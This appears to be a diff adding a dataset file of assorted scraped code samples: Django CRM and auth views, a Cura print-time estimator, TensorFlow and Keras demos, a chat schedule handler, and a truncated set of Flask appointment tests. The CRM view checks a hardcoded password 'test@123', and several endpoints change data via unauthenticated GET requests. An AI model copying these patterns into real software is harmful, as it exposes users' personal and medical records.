diff --git "a/481.jsonl" "b/481.jsonl" new file mode 100644--- /dev/null +++ "b/481.jsonl" @@ -0,0 +1,703 @@ +{"seq_id":"462251803","text":"import json\nimport os\nimport pickle\nfrom . import filters\nimport requests\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404\n# Create your views here.\nfrom django.views.generic import ListView, CreateView\nfrom jsignature.utils import draw_signature\nfrom django.core.files import File # you need this somewhere\nfrom Khurram_website import settings\nfrom django.template.loader import render_to_string\nfrom crm import forms, models\nfrom .models import Crm_Form, WpUsers\nfrom django.contrib import messages\nfrom django.views.generic.edit import UpdateView\n\ndef index(request):\n \n return render(request,'index.html')\n\n\n\n\n\nclass CRMFormView(CreateView):\n fields = ('user','usr','address','post_code','mobile_number','nearest_clinique','Treatment_intensity','address','GP_Name','GP_Address','Allergies','medical_condition','current_medical_treatment','medical_devices','counter_mediations','tatoos_permanent','pregnancy_or_breeding')\n model = Crm_Form\n template_name = 'crm/form.html'\n\ndef search_customers(request):\n request_dict = {}\n crm_forms = models.Crm_Form.objects\n try:\n value = request.GET['val']\n request_dict['search_field'] = value\n values = filters.customer_filter(value).order_by('full_name')\n \n available_forms = [crm_forms.get(customer__id=i.id) if len(crm_forms.filter(customer__id=i.id)) else False for i\n in values]\n \n mydict = zip(values, available_forms)\n request_dict['form'] = mydict\n return render(request, 'crm/customer_result.html', request_dict)\n\n except Exception as e:\n print(e)\n # values = models.WpBooklyCustomers.objects.all()\n # available_forms = [crm_forms.get(customer__id=i.id) if len(crm_forms.filter(customer__id=i.id)) else False for i in values]\n # mydict = zip(values,available_forms)\n \n # request_dict['form'] = mydict\n return render(request, 'crm/all_customers.html', request_dict)\n\n\ndef customer_profile(request, id):\n try:\n customers = models.WpBooklyCustomers.objects.get(pk=id)\n info = json.loads(customers.info_fields)\n ids_val = {}\n for i in info:\n ids_val[i['id']] = i['value']\n returndict = {'customer': customers}\n returndict['allow_phone'] = ids_val['94000'] if '94000' in ids_val else ''\n returndict['preffered_location'] = ids_val['24210'] if '24210' in ids_val else ''\n returndict['treatment_interested'] = ids_val['60317'] if '60317' in ids_val else ''\n returndict['hear_source'] = ids_val['1935'] if '1935' in ids_val else ''\n except Exception as e:\n returndict = {'error':\"Customer don't exist\"}\n returndict['id'] = id\n loyality = models.LoyalityPoints.objects.filter(customer_id=id).order_by('-pk')\n returndict['loyality_objects'] = loyality\n return render(request,'crm/customer_profile.html',returndict)\n\n'''def crm_form_update(request,id):\n\tmodel = models.Crm_Form.objects.get(customer__id=id)\n\tform = forms.crm_form_full(model)\n\treturn render(request,'crm/crm_form.html',{'form':form})\n'''\ndef crm_form_get(request):\n if request.method =='GET':\n try:\n arg = request.GET['customer']\n try:\n form = forms.crm_form_full2(instance=models.Crm_Form.objects.get(customer__id=arg))\n except:\n form = forms.crm_form_full(initial={'customer':arg})\n \n except Exception as e:\n raise e\n arg=''\n skey = request.session.session_key\n request.session.delete(skey)\n \n return render(request,'crm/crm_form.html',{'form':form})\n \n elif request.method == 'POST':\n print(request.POST['customer'])\n try:\n instance = models.Crm_Form.objects.get(customer__id=request.POST['customer'])\n signature = instance.Signature\n form = forms.crm_form_full2(request.POST or None,instance=instance)\n if form.is_valid():\n password = form.cleaned_data.get('Password')\n if password != 'test@123':\n return render(request, 'crm/crm_form.html',\n {'form': form, 'message': 'Password didn\\'t given or invalid'})\n form = form.save(commit=False)\n form.Signature = signature\n form.save()\n return render(request,'crm/crm form success.html')\n else:\n print(form.errors)\n return render(request, 'crm/crm_form.html', {'form': form})\n \n \n except Exception as e:\n \n form = forms.crm_form_full(request.POST)\n \n if form.is_valid():\n signature = form.cleaned_data.get('Signature')\n password = form.cleaned_data.get('Password')\n if password != 'test@123':\n \n return render(request,'crm/crm_form.html',{'form':form,'message':'Password didn\\'t given or invalid'})\n #\t\t\t\t\tHttpResponse(\"Incorrect Password or Password not supplied\")\n form = form.save(commit=False)\n \n if signature:\n # as an image\n signature_picture = draw_signature(signature)\n form.Signature = signature_picture\n model_id = models.Crm_Form.objects.count()\n pic_name = 'customer-{}.png'.format(model_id)\n signature_picture.save(os.path.join(settings.BASE_DIR, os.path.join('media',\n os.path.join('form_signatures',\n pic_name))))\n form.Signature = os.path.join('form_signatures',\n pic_name)\n \n # if form.is_valid:\n # form.Signature = request.FILES.get('Signature')\n form.save()\n return render(request,'crm/crm form success.html')\n else:\n print(form.errors)\n return render(request, 'crm/crm_form.html', {'form': form})\n#\n\ndef product_sold(request):\n form = forms.Product_sold_form()\n return render(request, 'crm/crm_form.html', {'form': form})\n\ndef add_loyality_points(request,id,value):\n customer = models.WpBooklyCustomers.objects.get(pk=id)\n previous = customer.loyality_points\n val = int(value)\n if previous is None: previous = 0\n customer.loyality_points = previous+val\n customer.save()\n return HttpResponse(customer.loyality_points)\n\ndef update_notes(request):\n try:\n form_id = request.GET['id']\n form_notes_value = request.GET['notes']\n form = get_object_or_404(models.Crm_Form,pk=form_id)\n form.notes = form_notes_value\n form.save()\n return HttpResponse(form_notes_value)\n except Exception as e:\n return HttpResponse(e)","sub_path":"crm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"7949673","text":"# Copyright (c) 2018 Ultimaker B.V.\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport os\n\nfrom datetime import timedelta\n\nimport re\nimport sys\nfrom subprocess import check_output, STDOUT, CalledProcessError\nfrom typing import List, Dict, Optional, Iterable, Tuple\n\nfrom Settings import Settings\nfrom curaPrintTimeEstimator.helpers import findModels\n\n\nclass ModelTimeCalculator:\n \"\"\"\n Class responsible for running the cura engine for all models found in the 'models' directory.\n The results are parsed and the expected print time is written to an output file.\n \"\"\"\n\n # which definition files should be used, excluding the .def.json extension.\n DEFINITIONS = (\"fdmprinter\", )\n\n # The file will contain the output of the time estimation (see self.gatherPrintTimeData)\n OUTPUT_FILE = \"{}/print_times.json\".format(Settings.PROJECT_DIR)\n\n def __init__(self):\n self.settings = dict(self._findSettings())\n\n @staticmethod\n def run() -> None:\n \"\"\"\n Runs the application.\n \"\"\"\n ModelTimeCalculator().gatherData()\n\n def gatherData(self) -> Dict[str, Dict[str, Dict[str, Optional[int]]]]:\n \"\"\"\n Gathers data about the estimated print time for one model, all settings and all definitions.\n :return: A dict with the format {\n model_name: {\n definition: {settings_name: print_time},\n }\n }.\n \"\"\"\n settings = dict(self._findSettings())\n\n if os.path.exists(self.OUTPUT_FILE):\n with open(self.OUTPUT_FILE) as f:\n result = json.load(f)\n else:\n result = {}\n\n try:\n for model in findModels():\n result[model] = self.gatherPrintTimeData(model, settings, prev_results=result.get(model))\n finally:\n with open(self.OUTPUT_FILE, \"w\") as f:\n json.dump(result, f, indent=2)\n logging.info(\"Results written to %s\", self.OUTPUT_FILE)\n\n return result\n\n @staticmethod\n def _findSettings() -> Iterable[Tuple[str, List[str]]]:\n \"\"\"\n Finds the TXT files available in the 'settings' sub folder.\n :return: An iterable of lists of settings each format: (settings_name, settings_parameters).\n \"\"\"\n directory = \"{}/settings\".format(Settings.PROJECT_DIR)\n files = os.listdir(directory)\n for name in sorted(files):\n if name.endswith(\".txt\"):\n with open(\"{}/{}\".format(directory, name)) as f:\n yield name[:-4], f.read().splitlines()\n\n def gatherPrintTimeData(self, model: str, settings: Dict[str, List[str]],\n prev_results: Optional[Dict[str, Dict[str, Optional[int]]]]\n ) -> Dict[str, Dict[str, Optional[int]]]:\n \"\"\"\n Gathers data about the estimated print time for one model, all settings and all definitions.\n :param model: The name of the model file, including the extension.\n :param settings: A dict with the settings file name and a list of settings for each of the files.\n :return: A dict with the format {definition: {settings_name: print_time}}.\n \"\"\"\n result = prev_results or {}\n for definition in self.DEFINITIONS:\n result.setdefault(definition, {})\n for setting_name, settings_parameters in settings.items():\n if result[definition].get(setting_name):\n logging.info(\"Model %s, definition %s and settings %s was already sliced, %s seconds to print.\",\n model, definition, settings, result[definition][setting_name])\n else:\n result[definition][setting_name] = self.slice(model, definition, settings_parameters)\n return result\n\n def slice(self, model_name: str, definition: str, settings: List[str]) -> Optional[int]:\n \"\"\"\n Runs the slicer, returning the estimated amount of seconds to print the model.\n :param model_name: The name of the model including the extension.\n :param definition: The definition file to be used, without the .def.json extension.\n :param settings: The extra settings to be passed to the engine.\n :return: The amount of seconds Cura expects the printing will take.\n \"\"\"\n logging.info(\"Slicing %s with definition %s and settings %s\", model_name, definition, settings)\n\n arguments = [\n Settings.CURA_ENGINE,\n \"slice\", \"-v\",\n \"-o\", \"NUL\" if sys.platform == \"win32\" else \"/dev/null\",\n \"-j\", os.path.join(Settings.CURA_DIR, \"resources\", \"definitions\", \"{}.def.json\".format(definition)),\n ]\n\n # Add the global settings\n for s in settings:\n arguments.extend([\"-s\", s])\n\n # Add the extruder0 settings\n for s in settings:\n arguments.extend([\"-e0\", \"-s\", s])\n\n arguments.extend([\"-e0\", \"-l\", os.path.join(Settings.PROJECT_DIR, \"models\", model_name)])\n\n try:\n output = check_output(arguments, stderr=STDOUT).decode()\n except CalledProcessError as err:\n if b\"Failed to load model:\" in err.output:\n logging.warning(\"Cannot load model %s: %s\", model_name, err.output)\n return None\n else:\n logging.error(err.output)\n raise\n return self._parsePrintTime(output)\n\n @staticmethod\n def _parsePrintTime(cura_output: str) -> int:\n \"\"\"\n Finds the expected print time in the output from the Cura engine.\n See tests/fixtures for examples of the output.\n :param cura_output: The output from the Cura Engine CLI.\n :return: The amount of seconds found in the output.\"\"\"\n search = re.search(r\"Print time: (\\d+)\\r?\\n\", cura_output)\n if not search:\n raise ValueError(\"Cannot parse the cura output {}\".format(cura_output))\n result = int(search.group(1))\n logging.info(\"Model will be printed in %s\", timedelta(seconds=result))\n return result\n","sub_path":"curaPrintTimeEstimator/helpers/ModelTimeCalculator.py","file_name":"ModelTimeCalculator.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"47784464","text":"import cv2\nfrom core.detect import create_mtcnn_net, MtcnnDetector\nimport core.vision as vision\n\n\n\n\nif __name__ == '__main__':\n\n pnet, rnet, onet = create_mtcnn_net(p_model_path=\"./model_store/pnet_epoch_5best.pt\", r_model_path=\"./model_store/rnet_epoch_1.pt\", o_model_path=\"./model_store/onet_epoch_7bbest.pt\", use_cuda=True)\n mtcnn_detector = MtcnnDetector(pnet=pnet, rnet=rnet, onet=onet, min_face_size=24)\n\n img = cv2.imread(\"./test.jpg\")\n b, g, r = cv2.split(img)\n img2 = cv2.merge([r, g, b])\n\n bboxs, landmarks = mtcnn_detector.detect_face(img)\n # print box_align\n\n vision.vis_face(img2,bboxs,landmarks)","sub_path":"test_image.py","file_name":"test_image.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81057156","text":"import ROOT\n\n\nclass PhysObject:\n def __init__(self, eta, phi, pt, mass, pid = None):\n \"\"\"\n Initializes simple representation of a physics object (track/neutral hadron/photon), containing\n just eta, phi, pt and mass.\n \"\"\"\n \n self.eta = eta\n self.phi = phi\n self.pt = pt\n self.mass = mass if mass is not None else 0\n self.pid = pid\n \n def get_four_vector(self):\n \"\"\"\n Returns ROOT TLorentzVector corresponding to this physics object.\n \"\"\"\n vector = ROOT.TLorentzVector()\n vector.SetPtEtaPhiM(self.pt, self.eta, self.phi, self.mass)\n return vector\n","sub_path":"rootToH5converter/PhysObject.py","file_name":"PhysObject.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210609960","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\"\"\"\n\nimport tensorflow.compat.v1 as tf # ver1.x\ntf.disable_v2_behavior() # ver2.0 사용안함\n\nfrom sklearn.metrics import accuracy_score\n\n# x, y data \n# x : [hours, video]\nx_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]] # [6,2]\n\n# y : binary data (fail or pass)\ny_data = [[0], [0], [0], [1], [1], [1]] # [6,1]\n\n# x, y 변수 정의\nX = tf.placeholder(dtype = tf.float32 , shape = [None , 2])\nY = tf.placeholder(dtype = tf.float32 , shape = [None , 1])\n\n# w , b\nw = tf.Variable(tf.random_normal([2,1]))\nb = tf.Variable(tf.random_normal([1]))\n\n# sigmoid classify\n# (1) model : 예측치 \nmodel = tf.matmul(X, w) + b \nsigmoid = tf.sigmoid(model) \n\n# (2) loss function : Entropy 수식 = -sum(Y * log(model)) \nloss = -tf.reduce_mean(Y * tf.log(sigmoid) + (1-Y) * tf.log(1-sigmoid))\n\n# (3) optimizer \ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(loss) \n\n#(4) cut-off :0.5\ncut_off = tf.cast(sigmoid > 0.5 , tf.float32)\n\n# model training\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n \n feed_data = { X : x_data , Y : y_data }\n \n for step in range(500):\n _, loss_val = sess.run([train , loss] , feed_dict = feed_data)\n \n if (step+1) %50 == 0 :\n print(\"step = {} , loss = {}\".format(step+1 , loss_val))\n\n #model 최적화\n y_true = sess.run(Y , feed_dict = {Y : y_data})\n y_pred = sess.run(cut_off , feed_dict = { X : x_data})\n \n acc = accuracy_score(y_true , y_pred)\n print(\"acc :\" , acc)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"tensorflow/C04_Classification/lecture_1.x/step03_sigmoid_classfy.py","file_name":"step03_sigmoid_classfy.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219229054","text":"import datetime\r\nrussianName = {\"ru\": \"Русский язык \", \"Ch\": \"Химия\", \"Mat\": \"Математика\", \"Phis\": \"Физика\"}\r\n\r\nteacherName = {\"ru\": \" с НЕКТО\", \"Ch\": \" c некто\", \"Mat\": \" с некто\", \"Phis\": \" с некто\"}\r\ndaysofweek = [\"Понедельник\", \"Вторник\", \"Среда\", \"Четверг\", \"Пятница\"]\r\nlessons = [\r\n [\"ru\", \"ru\", 'Ch', 'Ch', 'Mat', 'Mat'],\r\n [\"ch\", \"Mat\", 'Ch', 'Ch', 'Mat', 'Mat'],\r\n [\"ru\", \"ru\", 'hem', 'hem', 'ath', 'ath'],\r\n [\"Rs\", \"Rs\", 'Cm', 'Cm', 'Mh', 'Mh'],\r\n [\"Rs\", \"Rs\", 'Cm', 'Cm', \"Mat\", 'Mat']\r\n]\r\n\r\ntime = [\"9:00\", \"9:50\", \"10:40\", \"11:00\", \"12:00\", \"13:00\", \"14:00\", \"15:00\", \"16:00\", \"17:00\"]\r\nweday = datetime.datetime.now()\r\n\r\n\r\ndef handle_message(message, nickname=\"\"):\r\n\r\n income = message.split()\r\n day = income[0]\r\n\r\n if day == \"Сегодня\":\r\n answer = lessons[weday.weekday()]\r\n else:\r\n day = daysofweek.index(income[0])\r\n if int(len(income)) == 1:\r\n answer = lessons[day]\r\n else:\r\n\r\n number_of_lesson = int(income[1]) - 1\r\n\r\n currentLesson = lessons[day][number_of_lesson]\r\n\r\n answer = russianName[currentLesson] + teacherName[currentLesson] + \" в \" + time[number_of_lesson]\r\n\r\n return answer\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # dirty python magic, will talk about on the next lesson\r\n # just ignore for now\r\n\r\n nick = input(\"Enter your nickname: \")\r\n\r\n while True:\r\n msg = input(\"Your message: \")\r\n ans = handle_message(msg, nick)\r\n\r\n print(ans)\r\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525709034","text":"# Project 1 : perm_lex.py\n# Hunter Morse\n# CPE 202\n#\n\ndef perm_gen_lex(istring):\n # istring has zero or more lowercase letters in alpha order\n # fn is recursive\n # returns list of strings -- all permutations of input string\n\n# ilist = [letter for letter in istring]\n\n permutations = []\n\n if istring == None:\n raise ValueError\n elif len(istring) == 0:\n return []\n elif len(istring) == 1:\n permutations.append(istring)\n return permutations\n \n for letter_loc in range(len(istring)):\n letter = istring[letter_loc]\n endings = istring[:letter_loc] + istring[letter_loc + 1:]\n newPerms = perm_gen_lex(endings)\n# istring.replace(letter, '')\n# endings = perm_gen_lex(istring)\n# for letters in endings:\n# perms.append([letter] + letters)\n for perm in range(len(newPerms)):\n final = letter + newPerms[perm]\n permutations.append(final)\n\n\n\n return permutations\n\n\n\n\n\n\n\n\n","sub_path":"perm_lex.py","file_name":"perm_lex.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561008609","text":"import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Input, add\nfrom keras.layers import Layer, Dense, Dropout, Activation, Flatten, Reshape\nfrom keras import regularizers\nfrom keras.regularizers import l2\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.utils import np_utils\n\n(X_train, _), (X_test, _) = mnist.load_data()\n\n# 归一化\nX_train = X_train.astype(\"float32\") / 255.\nX_test = X_test.astype(\"float32\") / 255.\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\n# np.prod是将28X28矩阵转化成1X784,方便全连接神经网络输入层784个神经元读取。\nX_train = X_train.reshape((len(X_train), np.prod(X_train.shape[1:])))\nX_test = X_test.reshape((len(X_test), np.prod(X_test.shape[1:])))\n\ninput_size = 784\nhidden_size = 64\noutput_size = 784\n\nx = Input(shape=(input_size,))\nh = Dense(hidden_size, activation='relu')(x)\nr = Dense(output_size, activation='sigmoid')(h)\n\nautoencoder = Model(inputs=x, outputs=r)\nautoencoder.compile(optimizer='adam', loss='mse')\n\nepochs = 5\nbatch_size = 128\n\nhistory = autoencoder.fit(X_train, X_train, batch_size=batch_size, epochs=epochs, verbose=1,\n validation_data=(X_test, X_test))\n\nconv_encoder = Model(x, h)\nencoded_imgs = conv_encoder.predict(X_test)\n\ndecoded_imgs = autoencoder.predict(X_test)\nn = 10\nplt.figure(figsize=(20, 6))\nfor i in range(6):\n # ax = plt.subplot(3, n, i + 1)\n # plt.imshow(X_test[i].reshape(28, 28))\n # # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(False)\n\n ax = plt.subplot(2, 3, i + 1)\n plt.imshow(encoded_imgs[i].reshape(8, 8).T)\n # plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # ax = plt.subplot(3, n, i + 2 * n + 1)\n # plt.imshow(decoded_imgs[i].reshape(28, 28))\n # # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(False)\nplt.show()\n\nprint(history.history.keys())\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper right')\nplt.show()","sub_path":"自编码器/单层自编码器.py","file_name":"单层自编码器.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78650473","text":"from django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required,permission_required\nfrom django.shortcuts import render,redirect,reverse\n# from django.contrib.auth.models import User\nfrom django.http import HttpResponse\n# from .models import Person\n# from .models import UserExtension\nfrom .models import User,Article\nfrom .forms import LoginForm\nfrom django.contrib.auth.models import ContentType,Permission,Group\n# Create your views here.\ndef index(request):\n # user=User.objects.create_user(username='jxlg2',email='jxlg2@163.com',password='hq123123')#objects是UserManager\n # user=User.objects.create_superuser(username='jxlg1',email='jxlg1@163.com',password='hq123123')#objects是UserManager\n # user.save()\n\n # user=User.objects.get(pk=1)\n # user.set_password('123qwe123')\n\n # username = 'jxlg'\n # password = 'hq123123'\n # user = authenticate(request, username=username, password=password)\n # if user:\n # print('登录成功', user.username)\n # else:\n # print('用户名或密码错误')\n # return HttpResponse(\"OK\")\n return render(request,'index.html')\n# def proxys(request):\n# blacklists=Person.get_black_list()\n# for blacklist in blacklists:\n# print(blacklist)\n# return HttpResponse(\"blacklist\")\n#\n\n\n#\n# def my_authenticate(telephone,password):\n# user=User.objects.filter(extension__telephone=telephone).first()\n# if user:\n# is_correct=user.check_password(password)#方法自带\n# if is_correct:\n# return user\n# else:\n# return None\n# else:\n# return None\n\n#\n#\n# def one_view(request):\n# # user=User.objects.create_user(username='zhangsan',email='zhangsan@qq.com',password='zhangsan123')\n# # user.extension.telephone='13911111111'\n# # user.save()\n#\n# # user=User.objects.create_user(username='lisi',email='lisi@qq.com',password='lisi123')\n# # user.extension.telephone='13922222222'\n# # user.extension.school='清华大学'\n# # user.save()\n#\n# telephone=request.GET.get('telephone')\n# password=request.GET.get('password')\n# user=my_authenticate(telephone,password)\n# if user:\n# print(\"%s:验证成功\"%user.username)\n# else:\n# print(\"验证失败\")\n# return HttpResponse(\"一对一扩展模型\")\n\ndef inherit(request):\n # telephone='13933333333'\n # password='jxlg123'\n # username='jxlg'\n # school='江西理工大学'\n # email='jxlg@qq.com'\n # user=User.objects.create_user(telephone=telephone,username=username,email=email,password=password,school=school)\n # user.save()\n # # user=authenticate(request,telephone='13933333333',password='jxlg123')\n # # if user:\n # # print('验证成功')\n # # else:\n # # print('验证失败')\n\n\n # telephone='13933333333'\n # password='jxlg123'\n # username='jxlg'\n # email='jxlg@qq.com'\n # user=User.objects.create_user(telephone=telephone,username=username,email=email,password=password)\n # user.save()\n user = authenticate(request, username='13933333333', password='jxlg123')\n if user:\n print('验证成功')\n else:\n print('验证失败')\n return HttpResponse(\"模型继承\")\ndef my_login(request):\n if request.method==\"GET\":\n return render(request,'login.html')\n else:\n form=LoginForm(request.POST)\n if form.is_valid():\n telephone=form.cleaned_data.get('telephone')\n password=form.cleaned_data.get('password')\n remember=form.cleaned_data.get('remember')\n user=authenticate(request,username=telephone,password=password)\n\n if user and user.is_active:\n login(request,user)\n if remember:\n request.session.set_expiry(None)\n else:\n request.session.set_expiry(0)\n next_url=request.GET.get('next')\n if next_url:\n return redirect(next_url)\n else:\n return HttpResponse(\"登录成功\")\n else:\n return HttpResponse(\"手机号或密码错误\")\n else:\n print(form.errors.get_json_data())\n return redirect(reverse('login'))\ndef my_logout(request):\n logout(request)\n return redirect(reverse('index'))\n\n\n@login_required(login_url='/login/')\ndef profiles(request):\n return HttpResponse(\"我是个人中心,登录以后才可以查看\")\ndef add_permissions(request):\n #获取模型对应的ContentTypeId\n content_type=ContentType.objects.get_for_model(Article)\n permission=Permission.objects.create(codename='black_article',name='拉黑文章',content_type=content_type)\n permission.save()\n return HttpResponse(\"权限创建成功\")\ndef operate_permission(request):\n user=User.objects.first()\n content_type=ContentType.objects.get_for_model(Article)\n permissions=Permission.objects.filter(content_type=content_type)\n\n for permission in permissions:\n print(permission)\n\n user.user_permissions.set(permissions)\n user.save()\n\n # user.user_permissions.clear()\n # user.user_permissions.remove(*permission)\n\n if user.has_perm('front.view_article'):\n print('拥有查看文章的权限')\n else:print('没有查看文章的权限')\n print(user.get_all_permissions())\n\n return HttpResponse(\"操作权限成功\")\n@permission_required(['front.view_article','front.add_article'],login_url='/login/',raise_exception=True)\ndef add_article(request):\n if request.user.is_authenticated:\n print('已经登录了')\n if request.user.has_perm('front.add_article'):\n return HttpResponse(\"添加文章的页面\")\n else:\n return HttpResponse('您没有访问该页面的权限',status=403)\n else:\n return redirect(reverse('login'))\n\ndef operate_group(request):\n # group=Group.objects.create(name=\"运营\")\n # content_type = ContentType.objects.get_for_model(Article)\n # permissions=Permission.objects.filter(content_type=content_type)\n # group.permissions.from_queryset(permissions)\n # group.save()\n\n # user=User.objects.first()\n # group=Group.objects.filter(name='运营').first()\n # user.groups.add(group)\n # user.save()\n\n # user = User.objects.first()\n # permissions=user.get_group_permissions()\n # print(permissions)\n\n user = User.objects.first()\n if user.has_perms(['front.view_article','front.black_article']):#先看自己有没有,��看分组有没有\n print(\"有查看文章 拉黑文章权限\")\n else:\n print(\"没有有查看文章 拉黑文章权限\")\n return HttpResponse(\"操作分组\")","sub_path":"day0624/user_model_demo/front/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"425503811","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 8 20:25:00 2019\n\n@author: robin\n\"\"\"\n\nfrom QCM_utils import load_data, preprocessing\nfrom keras.models import load_model\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nX,Y,classes=load_data()\nnb_classes=len(classes)\nX,Y=preprocessing(X,Y,nb_classes)\nmodel = load_model('results/best_satisfaction_classifier.h5')\nprediction=model.predict(X[:12])\nprediction=np.argmax(prediction,axis=1)\n\nplt.figure()\nfor i,p in enumerate(prediction):\n plt.subplot(3,4,i+1)\n plt.axis('off')\n plt.title(\"Prediction : \"+classes[p])\n plt.imshow(np.reshape(X[i],(12,100)), cmap=\"gray\")\n plt.show() \n","sub_path":"prediction_with_best_model.py","file_name":"prediction_with_best_model.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"86162338","text":"import hfst\nimport re\n\npairs_with_insym = {}\n\nrule_dict_lst = []\nfinality_dict_lst = []\n\ndef dict_rule(rule_fst):\n brule = hfst.HfstBasicTransducer(rule_fst)\n rule_dict = {}\n final_states = set()\n for state in brule.states():\n if brule.is_final_state(state):\n final_states.add(state)\n trans_dict = {}\n for transition in brule.transitions(state):\n insym = transition.get_input_symbol()\n outsym = transition.get_output_symbol()\n target = transition.get_target_state()\n trans_dict[(insym,outsym)] = target\n if insym not in pairs_with_insym:\n pairs_with_insym[insym] = set()\n pairs_with_insym[insym].add((insym, outsym))\n rule_dict[state] = trans_dict\n return rule_dict, final_states\n\ndef init(rule_file_name):\n istream = hfst.HfstInputStream(rule_file_name)\n while not (istream.is_eof()):\n fst = istream.read()\n rule_d, final_states = dict_rule(fst)\n rule_dict_lst.append(rule_d)\n finality_dict_lst.append(final_states)\n istream.close()\n return\n\nresult_lst = []\n\ndef search(state_lst, insym_lst, outsym_lst):\n global result_lst\n if not insym_lst:\n for state, finality in zip(state_lst, finality_dict_lst):\n if state not in finality:\n return\n res = \"\".join(outsym_lst)\n result_lst.append(res)\n return\n insym = insym_lst[0]\n pair_set = pairs_with_insym[insym]\n for insym, outsym in pair_set:\n new_state_lst = []\n for state, rule_d in zip(state_lst, rule_dict_lst):\n if (insym, outsym) in rule_d[state]:\n new_state_lst.append(rule_d[state][(insym, outsym)])\n else:\n break\n else:\n new_outsym_lst = outsym_lst.copy()\n new_outsym_lst.append(outsym)\n search(new_state_lst, insym_lst[1:], new_outsym_lst)\n continue\n \n return\n \n\ndef generate(word):\n global result_lst, rule_dict_lst\n result_lst = []\n insym_lst = re.findall(r\"{[^{}]+}|[^{}]\", word)\n start_state_lst = [0 for r in rule_dict_lst]\n search(start_state_lst, insym_lst, [])\n return result_lst\n\nif __name__ == \"__main__\":\n import sys, re\n init(\"ofi-rules.fst\")\n for line_nl in sys.stdin:\n line = line_nl.strip()\n res = generate(line)\n print(\" -> \", res)\n print()\n \n","sub_path":"ofitwol/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"421493592","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\nimport time\n\nfrom flask import session\n\nfrom fbone.extensions import db\nfrom fbone.appointment.models import Appointment\n\nfrom fbone.appointment.views import (get_utc_seconds,\n get_local_minutes, appointment_ok)\n\nfrom tests import TestCase\n\n\nclass TestAppointment(TestCase):\n\n name = \"TestName\"\n email = \"testemail@sample.com\"\n timezone = float(-time.timezone/3600)\n message = \"Some kind of test message for calendar.\"\n today = date.today()\n epoch_date = date(1970, 1, 1)\n appointment_times = ((60, 120), (180, 300), (360, 600), (1200, 1440))\n\n def setUp(self):\n super(TestAppointment, self).setUp()\n self.init_some_appointments()\n\n def make_an_appointment(self, start_time, end_time, timezone):\n return Appointment(name=self.name,\n email=self.email,\n start_time=start_time,\n end_time=end_time,\n timezone=self.timezone,\n message=self.message)\n\n def make_an_appointment_dict(self, date, start_time, end_time):\n return dict(name=self.name,\n email=self.email,\n date=date,\n start_time=start_time,\n end_time=end_time,\n timezone=self.timezone,\n message=self.message)\n\n def init_some_appointments(self):\n for start, end in self.appointment_times:\n start_time = get_utc_seconds(self.today, start, self.timezone)\n end_time = get_utc_seconds(self.today, end, self.timezone)\n appointment = self.make_an_appointment(start_time, end_time,\n self.timezone)\n db.session.add(appointment)\n\n db.session.commit()\n\n def test_all_appointments(self):\n resp = self.client.get('/appointment/')\n self.assertEqual(resp.mimetype, 'application/json')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json['timezone'], 0.0)\n self.assertEqual(resp.json['date'], str(self.today))\n\n def test_all_appointments_with_date(self):\n date = '1988-08-08'\n resp = self.client.get('/appointment/?date=%s' % date)\n self.assertEqual(resp.mimetype, 'application/json')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json['timezone'], 0.0)\n 